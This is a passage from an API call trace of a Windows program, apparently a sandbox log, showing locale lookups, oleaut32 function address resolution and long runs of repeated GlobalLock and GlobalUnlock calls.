Locale=0x409, LCType=0x3e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="July") returned 5 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Aug") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="August") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sep") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18fd74, cchData=256 | out: lpLCData="September") returned 10 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Oct") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18fd74, cchData=256 | out: lpLCData="October") returned 8 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Nov") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18fd74, cchData=256 | out: lpLCData="November") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Dec") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18fd74, cchData=256 | out: lpLCData="December") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sun") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sunday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Mon") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Monday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tue") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Tuesday") returned 8 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wed") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Wednesday") returned 10 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thu") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Thursday") returned 9 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Fri") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Friday") returned 7 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Sat") returned 4 [0057.978] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18fd74, cchData=256 | out: lpLCData="Saturday") returned 9 [0057.978] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="$") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18fec8, cchData=2 | out: lpLCData=".") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="2") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18fec8, cchData=2 | out: lpLCData="/") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0057.979] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0057.979] GetThreadLocale () returned 0x409 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18fd9c, cchData=256 | out: lpLCData="1") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18fec8, cchData=2 | out: lpLCData=":") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="AM") returned 3 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="PM") returned 3 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18fdd0, cchData=256 | out: lpLCData="0") returned 2 [0057.979] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18fec8, cchData=2 | out: lpLCData=",") returned 2 [0057.979] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff24 | out: lpPerformanceCount=0x18ff24*=17833403954) returned 1 [0057.980] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76e40000 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeTypeEx") returned 0x76e44c28 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarNeg") returned 0x76ebc802 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarNot") returned 0x76ebec66 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarAdd") returned 0x76e65934 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarSub") returned 0x76ebd332 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarMul") returned 0x76ebdbd4 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarDiv") returned 0x76ebe405 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarIdiv") returned 0x76ebf00a [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarMod") returned 0x76ebf15e [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarAnd") returned 0x76e65a98 [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarOr") returned 0x76ebecfa [0057.980] GetProcAddress (hModule=0x76e40000, lpProcName="VarXor") returned 0x76ebee2e [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarCmp") returned 0x76e5b0dc [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarI4FromStr") returned 0x76e56fab [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarR4FromStr") returned 0x76e601a0 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarR8FromStr") returned 0x76e5699e [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarDateFromStr") returned 0x76e66ba7 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarCyFromStr") returned 0x76e86c12 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBoolFromStr") returned 0x76e5dbd1 [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromCy") returned 0x76e67fdc [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromDate") returned 0x76e57a2a [0057.981] GetProcAddress (hModule=0x76e40000, lpProcName="VarBstrFromBool") returned 0x76e60355 [0057.982] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.982] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.982] GlobalUnlock (hMem=0x280004) returned 0 [0057.982] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.982] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.982] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.983] GlobalUnlock (hMem=0x280004) returned 0 [0057.983] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.983] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.983] GlobalLock (hMem=0x280004) returned 0x600668 [0057.983] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.983] GlobalUnlock (hMem=0x28000c) returned 0 [0057.983] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.983] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x280004) returned 0x600668 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.984] GlobalUnlock (hMem=0x28000c) returned 0 [0057.984] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.984] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.984] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.984] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.984] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x280004) returned 0x600668 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.985] GlobalUnlock (hMem=0x280004) returned 0 [0057.985] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.985] GlobalUnlock (hMem=0x28000c) returned 0 [0057.985] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.985] GlobalLock (hMem=0x280004) returned 0x600668 [0057.985] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.986] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.986] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.986] GlobalLock (hMem=0x280004) returned 0x600668 [0057.986] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.986] GlobalUnlock (hMem=0x280004) returned 0 [0057.986] GlobalReAlloc (hMem=0x280004, dwBytes=0x10, uFlags=0x2) returned 0x280004 [0057.986] GlobalLock (hMem=0x280004) returned 0x600668 [0057.986] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.986] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.987] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.987] GlobalUnlock (hMem=0x280004) returned 0 [0057.987] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.987] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.987] GlobalUnlock (hMem=0x28000c) returned 0 [0057.987] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.987] GlobalLock (hMem=0x280004) returned 0x600668 [0057.987] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.988] GlobalLock (hMem=0x280004) returned 0x600668 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.988] GlobalUnlock (hMem=0x28000c) returned 0 [0057.988] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.988] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.988] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.988] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.989] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.989] GlobalLock (hMem=0x280004) returned 0x600668 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.989] GlobalUnlock (hMem=0x28000c) returned 0 [0057.989] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.989] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.989] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.989] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x280004) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.990] GlobalUnlock (hMem=0x28000c) returned 0 [0057.990] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.990] GlobalUnlock (hMem=0x280004) returned 0 [0057.990] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.990] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.990] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.991] GlobalLock (hMem=0x280004) returned 0x600668 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.991] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.991] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.991] GlobalUnlock (hMem=0x280004) returned 0 [0057.991] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.991] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalLock (hMem=0x280004) returned 0x600668 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.992] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.992] GlobalUnlock (hMem=0x280004) returned 0 [0057.992] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.992] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.992] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.992] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x280004) returned 0x600668 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.993] GlobalUnlock (hMem=0x280004) returned 0 [0057.993] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.993] GlobalUnlock (hMem=0x28000c) returned 0 [0057.993] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.993] GlobalLock (hMem=0x280004) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.994] GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.994] GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.994] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.994] GlobalUnlock (hMem=0x280004) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.994] GlobalLock (hMem=0x280004) returned 0x600668 [0057.994] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.994] GlobalUnlock (hMem=0x28000c) returned 0 [0057.994] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.995] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.995] GlobalLock (hMem=0x280004) returned 0x600668 [0057.995] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.995] GlobalUnlock (hMem=0x28000c) returned 0 [0057.995] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.995] GlobalUnlock (hMem=0x280004) returned 0 [0057.995] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x280004) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.996] GlobalUnlock (hMem=0x28000c) returned 0 [0057.996] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.996] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.996] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.996] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.996] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalLock (hMem=0x280004) returned 0x600668 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.997] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.997] GlobalUnlock (hMem=0x280004) returned 0 [0057.997] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.997] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.997] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.997] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x280004) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalHandle (pMem=0x600668) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] GlobalLock (hMem=0x280004) returned 0x5fe658 [0057.998] GlobalLock (hMem=0x28000c) returned 0x600668 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x280004 [0057.998] GlobalUnlock (hMem=0x280004) returned 0 [0057.998] GlobalHandle (pMem=0x600668) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] GlobalLock (hMem=0x28000c) returned 0x5fe658 [0057.998] GlobalHandle (pMem=0x5fe658) returned 0x28000c [0057.998] GlobalUnlock (hMem=0x28000c) returned 0 [0057.998] 